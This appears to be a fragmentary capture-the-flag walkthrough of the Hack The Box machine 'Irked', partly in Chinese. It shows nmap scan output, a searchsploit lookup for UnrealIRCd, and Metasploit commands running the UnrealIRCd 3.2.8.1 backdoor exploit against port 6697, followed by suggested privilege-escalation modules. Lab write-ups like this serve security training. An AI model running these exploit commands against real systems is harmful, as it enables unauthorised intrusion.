nmap -sS -Pn IP 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000)
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 49074/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd
80
1 2 3
<imgsrc=irked.jpg> <br> <b><center>IRC is almost working!</b></center>
Apache/2.4.10
10.10.10.117/manual/img/
IRC
1 2 3 4 5 6 7 8
searchsploit UnrealIRCd
浏览器访问以下地址,6697获得了一条信息:“ERROR :Closing Link: [10.10.14.13] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.” 10.10.10.117:6697 10.10.10.117:8067 10.10.10.117:65534
search UnrealIRCd
irc.rc
msfconsole -r irc.rc
1 2 3 4 5 6 7
use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOST IP set RPORT 6697 run
[+] 10.10.10.117 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The target service isrunning, but could not be validated. [+] 10.10.10.117 - exploit/linux/local/pkexec: The target service isrunning, but could not be validated. [*] Post module execution completed